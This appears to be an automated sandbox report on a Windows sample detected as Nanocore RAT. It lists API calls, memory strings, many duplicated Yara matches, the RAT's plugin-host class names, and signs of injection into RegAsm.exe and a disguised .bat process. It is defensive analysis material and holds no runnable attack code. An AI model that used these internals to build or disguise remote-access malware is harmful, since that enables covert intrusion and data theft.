        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
        Source: RegAsm.exe, 00000001.00000002.521170908.0000000002DD9000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp, DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: Shell_TrayWnd
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: RegAsm.exe, 00000001.00000002.519590997.0000000002BDF000.00000004.00000001.sdmpBinary or memory string: Program Manager<
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
        Source: RegAsm.exe, 00000001.00000002.521170908.0000000002DD9000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp, DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: Shell_TrayWnd
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: RegAsm.exe, 00000001.00000002.519590997.0000000002BDF000.00000004.00000001.sdmpBinary or memory string: Program Manager<
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E886B cpuid
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E886B cpuid
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A02230 GetUserNameW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A02230 GetUserNameW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F418A _free,_strlen,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F418A _free,_strlen,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
        Source: Yara matchFile source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_81
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_XP
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_XPe
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_VISTA
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_7
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_8
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_81
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_XP
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_XPe
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_VISTA
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_7
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: WIN_8
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
        Source: Yara matchFile source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
